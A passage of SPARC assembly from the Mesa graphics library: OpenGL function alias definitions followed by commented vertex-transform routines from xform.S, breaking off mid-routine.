.globl glValidateProgram ; .type glValidateProgram,#function ; glValidateProgram = glValidateProgramARB
.globl glBindAttribLocation ; .type glBindAttribLocation,#function ; glBindAttribLocation = glBindAttribLocationARB
.globl glGetActiveAttrib ; .type glGetActiveAttrib,#function ; glGetActiveAttrib = glGetActiveAttribARB
.globl glGetAttribLocation ; .type glGetAttribLocation,#function ; glGetAttribLocation = glGetAttribLocationARB
.globl glDrawBuffers ; .type glDrawBuffers,#function ; glDrawBuffers = glDrawBuffersARB
.globl glDrawBuffersATI ; .type glDrawBuffersATI,#function ; glDrawBuffersATI = glDrawBuffersARB
.globl glPointParameterf ; .type glPointParameterf,#function ; glPointParameterf = glPointParameterfEXT
.globl glPointParameterfARB ; .type glPointParameterfARB,#function ; glPointParameterfARB = glPointParameterfEXT
.globl glPointParameterfv ; .type glPointParameterfv,#function ; glPointParameterfv = glPointParameterfvEXT
.globl glPointParameterfvARB ; .type glPointParameterfvARB,#function ; glPointParameterfvARB = glPointParameterfvEXT
.globl glSecondaryColor3b ; .type glSecondaryColor3b,#function ; glSecondaryColor3b = glSecondaryColor3bEXT
.globl glSecondaryColor3bv ; .type glSecondaryColor3bv,#function ; glSecondaryColor3bv = glSecondaryColor3bvEXT
.globl glSecondaryColor3d ; .type glSecondaryColor3d,#function ; glSecondaryColor3d = glSecondaryColor3dEXT
.globl glSecondaryColor3dv ; .type glSecondaryColor3dv,#function ; glSecondaryColor3dv = glSecondaryColor3dvEXT
.globl glSecondaryColor3f ; .type glSecondaryColor3f,#function ; glSecondaryColor3f = glSecondaryColor3fEXT
.globl glSecondaryColor3fv ; .type glSecondaryColor3fv,#function ; glSecondaryColor3fv = glSecondaryColor3fvEXT
.globl glSecondaryColor3i ; .type glSecondaryColor3i,#function ; glSecondaryColor3i = glSecondaryColor3iEXT
.globl glSecondaryColor3iv ; .type glSecondaryColor3iv,#function ; glSecondaryColor3iv = glSecondaryColor3ivEXT
.globl glSecondaryColor3s ; .type glSecondaryColor3s,#function ; glSecondaryColor3s = glSecondaryColor3sEXT
.globl glSecondaryColor3sv ; .type glSecondaryColor3sv,#function ; glSecondaryColor3sv = glSecondaryColor3svEXT
.globl glSecondaryColor3ub ; .type glSecondaryColor3ub,#function ; glSecondaryColor3ub = glSecondaryColor3ubEXT
.globl glSecondaryColor3ubv ; .type glSecondaryColor3ubv,#function ; glSecondaryColor3ubv = glSecondaryColor3ubvEXT
.globl glSecondaryColor3ui ; .type glSecondaryColor3ui,#function ; glSecondaryColor3ui = glSecondaryColor3uiEXT
.globl glSecondaryColor3uiv ; .type glSecondaryColor3uiv,#function ; glSecondaryColor3uiv = glSecondaryColor3uivEXT
.globl glSecondaryColor3us ; .type glSecondaryColor3us,#function ; glSecondaryColor3us = glSecondaryColor3usEXT
.globl glSecondaryColor3usv ; .type glSecondaryColor3usv,#function ; glSecondaryColor3usv = glSecondaryColor3usvEXT
.globl glSecondaryColorPointer ; .type glSecondaryColorPointer,#function ; glSecondaryColorPointer = glSecondaryColorPointerEXT
.globl glMultiDrawArrays ; .type glMultiDrawArrays,#function ; glMultiDrawArrays = glMultiDrawArraysEXT
.globl glMultiDrawElements ; .type glMultiDrawElements,#function ; glMultiDrawElements = glMultiDrawElementsEXT
.globl glFogCoordPointer ; .type glFogCoordPointer,#function ; glFogCoordPointer = glFogCoordPointerEXT
.globl glFogCoordd ; .type glFogCoordd,#function ; glFogCoordd = glFogCoorddEXT
.globl glFogCoorddv ; .type glFogCoorddv,#function ; glFogCoorddv = glFogCoorddvEXT
.globl glFogCoordf ; .type glFogCoordf,#function ; glFogCoordf = glFogCoordfEXT
.globl glFogCoordfv ; .type glFogCoordfv,#function ; glFogCoordfv = glFogCoordfvEXT
.globl glBlendFuncSeparate ; .type glBlendFuncSeparate,#function ; glBlendFuncSeparate = glBlendFuncSeparateEXT
.globl glWindowPos2d ; .type glWindowPos2d,#function ; glWindowPos2d = glWindowPos2dMESA
.globl glWindowPos2dARB ; .type glWindowPos2dARB,#function ; glWindowPos2dARB = glWindowPos2dMESA
.globl glWindowPos2dv ; .type glWindowPos2dv,#function ; glWindowPos2dv = glWindowPos2dvMESA
.globl glWindowPos2dvARB ; .type glWindowPos2dvARB,#function ; glWindowPos2dvARB = glWindowPos2dvMESA
.globl glWindowPos2f ; .type glWindowPos2f,#function ; glWindowPos2f = glWindowPos2fMESA
.globl glWindowPos2fARB ; .type glWindowPos2fARB,#function ; glWindowPos2fARB = glWindowPos2fMESA
.globl glWindowPos2fv ; .type glWindowPos2fv,#function ; glWindowPos2fv = glWindowPos2fvMESA
.globl glWindowPos2fvARB ; .type glWindowPos2fvARB,#function ; glWindowPos2fvARB = glWindowPos2fvMESA
.globl glWindowPos2i ; .type glWindowPos2i,#function ; glWindowPos2i = glWindowPos2iMESA
.globl glWindowPos2iARB ; .type glWindowPos2iARB,#function ; glWindowPos2iARB = glWindowPos2iMESA
.globl glWindowPos2iv ; .type glWindowPos2iv,#function ; glWindowPos2iv = glWindowPos2ivMESA
.globl glWindowPos2ivARB ; .type glWindowPos2ivARB,#function ; glWindowPos2ivARB = glWindowPos2ivMESA
.globl glWindowPos2s ; .type glWindowPos2s,#function ; glWindowPos2s = glWindowPos2sMESA
.globl glWindowPos2sARB ; .type glWindowPos2sARB,#function ; glWindowPos2sARB = glWindowPos2sMESA
.globl glWindowPos2sv ; .type glWindowPos2sv,#function ; glWindowPos2sv = glWindowPos2svMESA
.globl glWindowPos2svARB ; .type glWindowPos2svARB,#function ; glWindowPos2svARB = glWindowPos2svMESA
.globl glWindowPos3d ; .type glWindowPos3d,#function ; glWindowPos3d = glWindowPos3dMESA
.globl glWindowPos3dARB ; .type glWindowPos3dARB,#function ; glWindowPos3dARB = glWindowPos3dMESA
.globl glWindowPos3dv ; .type glWindowPos3dv,#function ; glWindowPos3dv = glWindowPos3dvMESA
.globl glWindowPos3dvARB ; .type glWindowPos3dvARB,#function ; glWindowPos3dvARB = glWindowPos3dvMESA
.globl glWindowPos3f ; .type glWindowPos3f,#function ; glWindowPos3f = glWindowPos3fMESA
.globl glWindowPos3fARB ; .type glWindowPos3fARB,#function ; glWindowPos3fARB = glWindowPos3fMESA
.globl glWindowPos3fv ; .type glWindowPos3fv,#function ; glWindowPos3fv = glWindowPos3fvMESA
.globl glWindowPos3fvARB ; .type glWindowPos3fvARB,#function ; glWindowPos3fvARB = glWindowPos3fvMESA
.globl glWindowPos3i ; .type glWindowPos3i,#function ; glWindowPos3i = glWindowPos3iMESA
.globl glWindowPos3iARB ; .type glWindowPos3iARB,#function ; glWindowPos3iARB = glWindowPos3iMESA
.globl glWindowPos3iv ; .type glWindowPos3iv,#function ; glWindowPos3iv = glWindowPos3ivMESA
.globl glWindowPos3ivARB ; .type glWindowPos3ivARB,#function ; glWindowPos3ivARB = glWindowPos3ivMESA
.globl glWindowPos3s ; .type glWindowPos3s,#function ; glWindowPos3s = glWindowPos3sMESA
.globl glWindowPos3sARB ; .type glWindowPos3sARB,#function ; glWindowPos3sARB = glWindowPos3sMESA
.globl glWindowPos3sv ; .type glWindowPos3sv,#function ; glWindowPos3sv = glWindowPos3svMESA
.globl glWindowPos3svARB ; .type glWindowPos3svARB,#function ; glWindowPos3svARB = glWindowPos3svMESA
.globl glBindProgramARB ; .type glBindProgramARB,#function ; glBindProgramARB = glBindProgramNV
.globl glDeleteProgramsARB ; .type glDeleteProgramsARB,#function ; glDeleteProgramsARB = glDeleteProgramsNV
.globl glGenProgramsARB ; .type glGenProgramsARB,#function ; glGenProgramsARB = glGenProgramsNV
.globl glGetVertexAttribPointerv ; .type glGetVertexAttribPointerv,#function ; glGetVertexAttribPointerv = glGetVertexAttribPointervNV
.globl glGetVertexAttribPointervARB ; .type glGetVertexAttribPointervARB,#function ; glGetVertexAttribPointervARB = glGetVertexAttribPointervNV
.globl glIsProgramARB ; .type glIsProgramARB,#function ; glIsProgramARB = glIsProgramNV
.globl glPointParameteri ; .type glPointParameteri,#function ; glPointParameteri = glPointParameteriNV
.globl glPointParameteriv ; .type glPointParameteriv,#function ; glPointParameteriv = glPointParameterivNV
.globl glBlendEquationSeparate ; .type glBlendEquationSeparate,#function ; glBlendEquationSeparate = glBlendEquationSeparateEXT
/* ---- file boundary (extraction artifact) ----------------------------------
 * The metadata lines that stood here separate two concatenated sources and
 * are not assembly; preserved as a comment so the file still assembles:
 *   repo: AIFM-sys/AIFM   size: 34,643 bytes
 *   path: shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/sparc/xform.S
 * -------------------------------------------------------------------------*/
/* $Id: xform.S,v 1.1.1.1 2012/03/29 17:22:11 uid42307 Exp $ */
/* TODO
*
* 1) It would be nice if load/store double could be used
* at least for the matrix parts. I think for the matrices
* it is safe, but for the vertices it probably is not due to
* things like glInterleavedArrays etc.
*
* UPDATE: Trying this now in sparc_matrix.h -DaveM_990624
*
* 2) One extremely slick trick would be if we could enclose
* groups of xform calls on the same vertices such that
* we just load the matrix into f16-->f31 before the calls
* and then we would not have to do them here. This may be
* tricky and not much of a gain though.
*/
#include "sparc_matrix.h"
#if defined(SVR4) || defined(__SVR4) || defined(__svr4__)
/* Solaris requires this for 64-bit. */
.register %g2, #scratch
.register %g3, #scratch
#endif
.text
.align 64
/*
 * __set_v4f_1: stamp the vector object at %o0 as holding 1-component
 * elements.  Writes 1 into its V4F_SIZE field and ORs VEC_SIZE_1 into its
 * V4F_FLAGS word (offsets and flag values come from sparc_matrix.h).
 * In:      %o0 = vector object pointer
 * Clobber: %g1, %g2
 * Note: the flags store executes in the retl delay slot.
 */
__set_v4f_1:
	ld [%o0 + V4F_FLAGS], %g2	! %g2 = current flags word
	mov 1, %g1
	st %g1, [%o0 + V4F_SIZE]	! size = 1
	or %g2, VEC_SIZE_1, %g2
	retl
	 st %g2, [%o0 + V4F_FLAGS]	! delay slot: flags |= VEC_SIZE_1
/*
 * __set_v4f_2: stamp the vector object at %o0 as holding 2-component
 * elements (V4F_SIZE = 2, V4F_FLAGS |= VEC_SIZE_2).
 * In:      %o0 = vector object pointer
 * Clobber: %g1, %g2
 * Note: the flags store executes in the retl delay slot.
 */
__set_v4f_2:
	ld [%o0 + V4F_FLAGS], %g2	! %g2 = current flags word
	mov 2, %g1
	st %g1, [%o0 + V4F_SIZE]	! size = 2
	or %g2, VEC_SIZE_2, %g2
	retl
	 st %g2, [%o0 + V4F_FLAGS]	! delay slot: flags |= VEC_SIZE_2
/*
 * __set_v4f_3: stamp the vector object at %o0 as holding 3-component
 * elements (V4F_SIZE = 3, V4F_FLAGS |= VEC_SIZE_3).
 * In:      %o0 = vector object pointer
 * Clobber: %g1, %g2
 * Note: the flags store executes in the retl delay slot.
 */
__set_v4f_3:
	ld [%o0 + V4F_FLAGS], %g2	! %g2 = current flags word
	mov 3, %g1
	st %g1, [%o0 + V4F_SIZE]	! size = 3
	or %g2, VEC_SIZE_3, %g2
	retl
	 st %g2, [%o0 + V4F_FLAGS]	! delay slot: flags |= VEC_SIZE_3
/*
 * __set_v4f_4: stamp the vector object at %o0 as holding 4-component
 * elements (V4F_SIZE = 4, V4F_FLAGS |= VEC_SIZE_4).
 * In:      %o0 = vector object pointer
 * Clobber: %g1, %g2
 * Note: the flags store executes in the retl delay slot.
 */
__set_v4f_4:
	ld [%o0 + V4F_FLAGS], %g2	! %g2 = current flags word
	mov 4, %g1
	st %g1, [%o0 + V4F_SIZE]	! size = 4
	or %g2, VEC_SIZE_4, %g2
	retl
	 st %g2, [%o0 + V4F_FLAGS]	! delay slot: flags |= VEC_SIZE_4
/* First the raw versions. */

/*
 * _mesa_sparc_transform_points1_general:
 *   Transform 1-component source points by the full 4x4 matrix, producing
 *   4-component results:
 *     out = { x*m0 + m12, x*m1 + m13, x*m2 + m14, x*m3 + m15 }
 * In:      %o0 = dest vector object, %o1 = matrix data (via LDMATRIX),
 *          %o2 = source vector object
 * Locals:  %o5 = src stride, %g1 = src ptr, %g2 = dest ptr (16 bytes/point),
 *          %g3 = count; %o1 is then reused as the loop counter and
 *          %o2 as count rounded down to even (count & ~1).
 * The main loop at 1: is unrolled two points per iteration; a leftover odd
 * point is handled at 2:.  Ends by tail-branching to __set_v4f_4.
 * NOTE(review): the "LSU/IEU/FGM/FGA Group" comments describe UltraSPARC
 * pipeline grouping; instruction order is load-bearing — do not reorder.
 */
	.globl _mesa_sparc_transform_points1_general
_mesa_sparc_transform_points1_general:
	ld [%o2 + V4F_STRIDE], %o5	! %o5 = source stride in bytes
	LDPTR [%o2 + V4F_START], %g1	! %g1 = source data pointer
	LDPTR [%o0 + V4F_START], %g2	! %g2 = dest data pointer
	ld [%o2 + V4F_COUNT], %g3	! %g3 = number of points
	LDMATRIX_0_1_2_3_12_13_14_15(%o1)	! load m0..m3, m12..m15 into FP regs
	cmp %g3, 1
	st %g3, [%o0 + V4F_COUNT]	! dest count = source count
	bl 3f				! count < 1: nothing to do
	 clr %o1			! delay slot: loop counter = 0
	be 2f				! count == 1: single-point tail only
	 andn %g3, 1, %o2		! delay slot: %o2 = count & ~1
	! --- unrolled loop: two points per iteration ---
1:	ld [%g1 + 0x00], %f0 ! LSU Group
	add %g1, %o5, %g1 ! IEU0
	ld [%g1 + 0x00], %f8 ! LSU Group
	add %o1, 2, %o1 ! IEU0
	add %g1, %o5, %g1 ! IEU1
	fmuls %f0, M0, %f1 ! FGM Group 1-cycle stall on %f0
	fmuls %f0, M1, %f2 ! FGM Group
	fmuls %f0, M2, %f3 ! FGM Group
	fmuls %f0, M3, %f4 ! FGM Group
	fmuls %f8, M0, %f9 ! FGM Group f1 available
	fadds %f1, M12, %f1 ! FGA
	st %f1, [%g2 + 0x00] ! LSU
	fmuls %f8, M1, %f10 ! FGM Group f2 available
	fadds %f2, M13, %f2 ! FGA
	st %f2, [%g2 + 0x04] ! LSU
	fmuls %f8, M2, %f11 ! FGM Group f3 available
	fadds %f3, M14, %f3 ! FGA
	st %f3, [%g2 + 0x08] ! LSU
	fmuls %f8, M3, %f12 ! FGM Group f4 available
	fadds %f4, M15, %f4 ! FGA
	st %f4, [%g2 + 0x0c] ! LSU
	fadds %f9, M12, %f9 ! FGA Group f9 available
	st %f9, [%g2 + 0x10] ! LSU
	fadds %f10, M13, %f10 ! FGA Group f10 available
	st %f10, [%g2 + 0x14] ! LSU
	fadds %f11, M14, %f11 ! FGA Group f11 available
	st %f11, [%g2 + 0x18] ! LSU
	fadds %f12, M15, %f12 ! FGA Group f12 available
	st %f12, [%g2 + 0x1c] ! LSU
	cmp %o1, %o2 ! IEU1
	bne 1b ! CTI
	 add %g2, 0x20, %g2 ! IEU0 Group	delay slot: dest += 2 points
	cmp %o1, %g3
	be 3f				! even count: done
	 nop
	! --- tail: one leftover point ---
2:	ld [%g1 + 0x00], %f0 ! LSU Group
	fmuls %f0, M0, %f1 ! FGM Group 1-cycle stall on %f0
	fmuls %f0, M1, %f2 ! FGM Group
	fmuls %f0, M2, %f3 ! FGM Group
	fmuls %f0, M3, %f4 ! FGM Group
	fadds %f1, M12, %f1 ! FGA Group
	st %f1, [%g2 + 0x00] ! LSU
	fadds %f2, M13, %f2 ! FGA Group
	st %f2, [%g2 + 0x04] ! LSU
	fadds %f3, M14, %f3 ! FGA Group
	st %f3, [%g2 + 0x08] ! LSU
	fadds %f4, M15, %f4 ! FGA Group
	st %f4, [%g2 + 0x0c] ! LSU
3:
	ba __set_v4f_4			! tail-call: mark dest as 4-component
	 nop
/*
 * _mesa_sparc_transform_points1_identity:
 *   Identity transform for 1-component points: copy each source x into the
 *   dest array (dest points are 16 bytes apart).  If dest and source are
 *   the same object (%o0 == %o2), returns immediately without copying.
 * In:      %o0 = dest vector object, %o2 = source vector object
 *          (%o1, the matrix, is unused here)
 * Locals:  %o5 = src stride, %g1 = src ptr, %g2 = dest ptr, %g3 = count,
 *          %o1 = loop counter, %o2 reused as count & ~1.
 * Ends by tail-branching to __set_v4f_1.
 */
	.globl _mesa_sparc_transform_points1_identity
_mesa_sparc_transform_points1_identity:
	cmp %o0, %o2			! same object?
	be 4f				! yes: nothing to copy
	 ld [%o2 + V4F_STRIDE], %o5	! delay slot (harmless if taken)
	LDPTR [%o2 + V4F_START], %g1	! %g1 = source data pointer
	LDPTR [%o0 + V4F_START], %g2	! %g2 = dest data pointer
	ld [%o2 + V4F_COUNT], %g3	! %g3 = number of points
	cmp %g3, 1
	st %g3, [%o0 + V4F_COUNT]	! dest count = source count
	bl 3f				! count < 1: done
	 clr %o1			! delay slot: loop counter = 0
	be 2f				! count == 1: tail only
	 andn %g3, 1, %o2		! delay slot: %o2 = count & ~1
	! --- unrolled loop: two points per iteration ---
1:	ld [%g1 + 0x00], %f0 ! LSU Group
	add %g1, %o5, %g1 ! IEU0
	ld [%g1 + 0x00], %f1 ! LSU Group
	add %o1, 2, %o1 ! IEU0
	add %g1, %o5, %g1 ! IEU1
	st %f0, [%g2 + 0x00] ! LSU Group
	cmp %o1, %o2 ! IEU1
	st %f1, [%g2 + 0x10] ! LSU Group
	bne 1b ! CTI
	 add %g2, 0x20, %g2 ! IEU0	delay slot: dest += 2 points
	cmp %o1, %g3
	be 3f				! even count: done
	 nop
	! --- tail: one leftover point ---
2:	ld [%g1 + 0x00], %f0
	addx %g0, %g0, %g0		! no-op (pipeline padding)
	st %f0, [%g2 + 0x00]
3:
	ba __set_v4f_1			! tail-call: mark dest as 1-component
	 nop
4:	retl				! src == dest: early return
	 nop
/*
 * _mesa_sparc_transform_points1_2d:
 *   Transform 1-component points by a 2D matrix (rotation + translation
 *   terms m0, m1, m12, m13), producing 2-component results:
 *     out = { x*m0 + m12, x*m1 + m13 }
 * In:      %o0 = dest vector object, %o1 = matrix data, %o2 = source vector
 * Locals:  %o5 = src stride, %g1 = src ptr, %g2 = dest ptr (16 bytes/point),
 *          %g3 = count, %o1 = loop counter, %o2 reused as count & ~1.
 * Unrolled two points per iteration; odd point handled at 2:.
 * Ends by tail-branching to __set_v4f_2.
 */
	.globl _mesa_sparc_transform_points1_2d
_mesa_sparc_transform_points1_2d:
	ld [%o2 + V4F_STRIDE], %o5	! %o5 = source stride in bytes
	LDPTR [%o2 + V4F_START], %g1	! %g1 = source data pointer
	LDPTR [%o0 + V4F_START], %g2	! %g2 = dest data pointer
	ld [%o2 + V4F_COUNT], %g3	! %g3 = number of points
	LDMATRIX_0_1_12_13(%o1)		! load m0, m1, m12, m13
	cmp %g3, 1
	st %g3, [%o0 + V4F_COUNT]	! dest count = source count
	bl 3f				! count < 1: done
	 clr %o1			! delay slot: loop counter = 0
	be 2f				! count == 1: tail only
	 andn %g3, 1, %o2		! delay slot: %o2 = count & ~1
	! --- unrolled loop: two points per iteration ---
1:	ld [%g1 + 0x00], %f0 ! LSU Group
	add %g1, %o5, %g1 ! IEU0
	ld [%g1 + 0x00], %f8 ! LSU Group
	add %o1, 2, %o1 ! IEU0
	add %g1, %o5, %g1 ! IEU1
	fmuls %f0, M0, %f1 ! FGM Group
	fmuls %f0, M1, %f2 ! FGM Group
	fmuls %f8, M0, %f9 ! FGM Group
	fmuls %f8, M1, %f10 ! FGM Group
	fadds %f1, M12, %f3 ! FGA Group f1 available
	st %f3, [%g2 + 0x00] ! LSU
	fadds %f2, M13, %f4 ! FGA Group f2 available
	st %f4, [%g2 + 0x04] ! LSU
	fadds %f9, M12, %f11 ! FGA Group f9 available
	st %f11, [%g2 + 0x10] ! LSU
	fadds %f10, M13, %f12 ! FGA Group f10 available
	st %f12, [%g2 + 0x14] ! LSU
	cmp %o1, %o2 ! IEU1
	bne 1b ! CTI
	 add %g2, 0x20, %g2 ! IEU0 Group	delay slot: dest += 2 points
	cmp %o1, %g3
	be 3f				! even count: done
	 nop
	! --- tail: one leftover point ---
2:	ld [%g1 + 0x00], %f0
	fmuls %f0, M0, %f1
	fmuls %f0, M1, %f2
	fadds %f1, M12, %f3
	st %f3, [%g2 + 0x00]
	fadds %f2, M13, %f4
	st %f4, [%g2 + 0x04]
3:
	ba __set_v4f_2			! tail-call: mark dest as 2-component
	 nop
/*
 * _mesa_sparc_transform_points1_2d_no_rot:
 *   Transform 1-component points by a 2D matrix with no rotation
 *   (scale m0 plus translation m12, m13), producing 2-component results:
 *     out = { x*m0 + m12, m13 }
 *   (the y output is the constant m13, stored directly from the FP reg).
 * In:      %o0 = dest vector object, %o1 = matrix data, %o2 = source vector
 * Locals:  %o5 = src stride, %g1 = src ptr, %g2 = dest ptr (16 bytes/point),
 *          %g3 = count, %o1 = loop counter, %o2 reused as count & ~1.
 * Ends by tail-branching to __set_v4f_2.
 */
	.globl _mesa_sparc_transform_points1_2d_no_rot
_mesa_sparc_transform_points1_2d_no_rot:
	ld [%o2 + V4F_STRIDE], %o5	! %o5 = source stride in bytes
	LDPTR [%o2 + V4F_START], %g1	! %g1 = source data pointer
	LDPTR [%o0 + V4F_START], %g2	! %g2 = dest data pointer
	ld [%o2 + V4F_COUNT], %g3	! %g3 = number of points
	LDMATRIX_0_12_13(%o1)		! load m0, m12, m13
	cmp %g3, 1
	st %g3, [%o0 + V4F_COUNT]	! dest count = source count
	bl 3f				! count < 1: done
	 clr %o1			! delay slot: loop counter = 0
	be 2f				! count == 1: tail only
	 andn %g3, 1, %o2		! delay slot: %o2 = count & ~1
	! --- unrolled loop: two points per iteration ---
1:	ld [%g1 + 0x00], %f0 ! LSU Group
	add %g1, %o5, %g1 ! IEU0
	ld [%g1 + 0x00], %f4 ! LSU Group
	add %o1, 2, %o1 ! IEU0
	add %g1, %o5, %g1 ! IEU1
	fmuls %f0, M0, %f1 ! FGM Group
	fmuls %f4, M0, %f5 ! FGM Group
	fadds %f1, M12, %f3 ! FGA Group, 2 cycle stall, f1 available
	st %f3, [%g2 + 0x00] ! LSU
	st M13, [%g2 + 0x04] ! LSU Group, f5 available
	fadds %f5, M12, %f6 ! FGA
	st %f6, [%g2 + 0x10] ! LSU Group
	st M13, [%g2 + 0x14] ! LSU Group
	cmp %o1, %o2 ! IEU1
	bne 1b ! CTI
	 add %g2, 0x20, %g2 ! IEU0 Group	delay slot: dest += 2 points
	cmp %o1, %g3
	be 3f				! even count: done
	 nop
	! --- tail: one leftover point ---
2:	ld [%g1 + 0x00], %f0
	fmuls %f0, M0, %f1
	fadds %f1, M12, %f3
	st %f3, [%g2 + 0x00]
	st M13, [%g2 + 0x04]
3:
	ba __set_v4f_2			! tail-call: mark dest as 2-component
	 nop
/*
 * _mesa_sparc_transform_points1_3d:
 *   Transform 1-component points by a 3D matrix (m0..m2 plus translation
 *   m12..m14), producing 3-component results:
 *     out = { x*m0 + m12, x*m1 + m13, x*m2 + m14 }
 * In:      %o0 = dest vector object, %o1 = matrix data, %o2 = source vector
 * Locals:  %o5 = src stride, %g1 = src ptr, %g2 = dest ptr (16 bytes/point),
 *          %g3 = count, %o1 = loop counter, %o2 reused as count & ~1.
 * Unrolled two points per iteration; odd point handled at 2:.
 * Ends by tail-branching to __set_v4f_3.
 */
	.globl _mesa_sparc_transform_points1_3d
_mesa_sparc_transform_points1_3d:
	ld [%o2 + V4F_STRIDE], %o5	! %o5 = source stride in bytes
	LDPTR [%o2 + V4F_START], %g1	! %g1 = source data pointer
	LDPTR [%o0 + V4F_START], %g2	! %g2 = dest data pointer
	ld [%o2 + V4F_COUNT], %g3	! %g3 = number of points
	LDMATRIX_0_1_2_12_13_14(%o1)	! load m0..m2, m12..m14
	cmp %g3, 1
	st %g3, [%o0 + V4F_COUNT]	! dest count = source count
	bl 3f				! count < 1: done
	 clr %o1			! delay slot: loop counter = 0
	be 2f				! count == 1: tail only
	 andn %g3, 1, %o2		! delay slot: %o2 = count & ~1
	! --- unrolled loop: two points per iteration ---
1:	ld [%g1 + 0x00], %f0 ! LSU Group
	add %g1, %o5, %g1 ! IEU0
	ld [%g1 + 0x00], %f4 ! LSU Group
	add %o1, 2, %o1 ! IEU0
	add %g1, %o5, %g1 ! IEU1
	fmuls %f0, M0, %f1 ! FGM Group
	fmuls %f0, M1, %f2 ! FGM Group
	fmuls %f0, M2, %f3 ! FGM Group
	fmuls %f4, M0, %f5 ! FGM Group
	fadds %f1, M12, %f1 ! FGA Group, f1 available
	st %f1, [%g2 + 0x00] ! LSU
	fmuls %f4, M1, %f6 ! FGM
	fadds %f2, M13, %f2 ! FGA Group, f2 available
	st %f2, [%g2 + 0x04] ! LSU
	fmuls %f4, M2, %f7 ! FGM
	fadds %f3, M14, %f3 ! FGA Group, f3 available
	st %f3, [%g2 + 0x08] ! LSU
	fadds %f5, M12, %f5 ! FGA Group, f5 available
	st %f5, [%g2 + 0x10] ! LSU
	fadds %f6, M13, %f6 ! FGA Group, f6 available
	st %f6, [%g2 + 0x14] ! LSU
	fadds %f7, M14, %f7 ! FGA Group, f7 available
	st %f7, [%g2 + 0x18] ! LSU
	cmp %o1, %o2 ! IEU1
	bne 1b ! CTI
	 add %g2, 0x20, %g2 ! IEU0 Group	delay slot: dest += 2 points
	cmp %o1, %g3
	be 3f				! even count: done
	 nop
	! --- tail: one leftover point ---
2:	ld [%g1 + 0x00], %f0
	fmuls %f0, M0, %f1
	fmuls %f0, M1, %f2
	fmuls %f0, M2, %f3
	fadds %f1, M12, %f1
	st %f1, [%g2 + 0x00]
	fadds %f2, M13, %f2
	st %f2, [%g2 + 0x04]
	fadds %f3, M14, %f3
	st %f3, [%g2 + 0x08]
3:
	ba __set_v4f_3			! tail-call: mark dest as 3-component
	 nop
/*
 * _mesa_sparc_transform_points1_3d_no_rot:
 *   Transform 1-component points by a 3D matrix with no rotation
 *   (scale m0 plus translation m12..m14), producing 3-component results:
 *     out = { x*m0 + m12, m13, m14 }
 *   (y and z outputs are the constants m13 and m14, stored directly).
 * In:      %o0 = dest vector object, %o1 = matrix data, %o2 = source vector
 * Locals:  %o5 = src stride, %g1 = src ptr, %g2 = dest ptr (16 bytes/point),
 *          %g3 = count, %o1 = loop counter, %o2 reused as count & ~1.
 * Ends by tail-branching to __set_v4f_3.
 */
	.globl _mesa_sparc_transform_points1_3d_no_rot
_mesa_sparc_transform_points1_3d_no_rot:
	ld [%o2 + V4F_STRIDE], %o5	! %o5 = source stride in bytes
	LDPTR [%o2 + V4F_START], %g1	! %g1 = source data pointer
	LDPTR [%o0 + V4F_START], %g2	! %g2 = dest data pointer
	ld [%o2 + V4F_COUNT], %g3	! %g3 = number of points
	LDMATRIX_0_12_13_14(%o1)	! load m0, m12, m13, m14
	cmp %g3, 1
	st %g3, [%o0 + V4F_COUNT]	! dest count = source count
	bl 3f				! count < 1: done
	 clr %o1			! delay slot: loop counter = 0
	be 2f				! count == 1: tail only
	 andn %g3, 1, %o2		! delay slot: %o2 = count & ~1
	! --- unrolled loop: two points per iteration ---
1:	ld [%g1 + 0x00], %f0 ! LSU Group
	add %g1, %o5, %g1 ! IEU0
	ld [%g1 + 0x00], %f2 ! LSU Group
	add %o1, 2, %o1 ! IEU0
	add %g1, %o5, %g1 ! IEU1
	fmuls %f0, M0, %f1 ! FGM Group
	fmuls %f2, M0, %f3 ! FGM Group
	fadds %f1, M12, %f1 ! FGA Group, 2 cycle stall, f1 available
	st %f1, [%g2 + 0x00] ! LSU
	fadds %f3, M12, %f3 ! FGA Group, f3 available
	st M13, [%g2 + 0x04] ! LSU
	st M14, [%g2 + 0x08] ! LSU Group
	st %f3, [%g2 + 0x10] ! LSU Group
	st M13, [%g2 + 0x14] ! LSU Group
	st M14, [%g2 + 0x18] ! LSU Group
	cmp %o1, %o2 ! IEU1
	bne 1b ! CTI
	 add %g2, 0x20, %g2 ! IEU0 Group	delay slot: dest += 2 points
	cmp %o1, %g3
	be 3f				! even count: done
	 nop
	! --- tail: one leftover point ---
2:	ld [%g1 + 0x00], %f0
	fmuls %f0, M0, %f1
	fadds %f1, M12, %f1
	st %f1, [%g2 + 0x00]
	st M13, [%g2 + 0x04]
	st M14, [%g2 + 0x08]
3:
	ba __set_v4f_3			! tail-call: mark dest as 3-component
	 nop
! _mesa_sparc_transform_points1_perspective
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x only): dest = (x*M0, 0.0, M14, 0.0); the 0.0 entries are
! stored from %g0 (integer zero == IEEE 0.0f bit pattern).
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o2 = count & ~1.
.globl _mesa_sparc_transform_points1_perspective
_mesa_sparc_transform_points1_perspective:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_14(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2 ! delay slot: even loop bound
1: ld [%g1 + 0x00], %f0 ! LSU Group
add %g1, %o5, %g1 ! IEU0
ld [%g1 + 0x00], %f2 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f1 ! FGM Group
st %f1, [%g2 + 0x00] ! LSU
fmuls %f2, M0, %f3 ! FGM Group
st %g0, [%g2 + 0x04] ! LSU
st M14, [%g2 + 0x08] ! LSU Group
st %g0, [%g2 + 0x0c] ! LSU Group
st %f3, [%g2 + 0x10] ! LSU Group
st %g0, [%g2 + 0x14] ! LSU Group
st M14, [%g2 + 0x18] ! LSU Group
st %g0, [%g2 + 0x1c] ! LSU Group
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0 ! leftover odd point
fmuls %f0, M0, %f1
st %f1, [%g2 + 0x00]
st %g0, [%g2 + 0x04]
st M14, [%g2 + 0x08]
st %g0, [%g2 + 0x0c]
3:
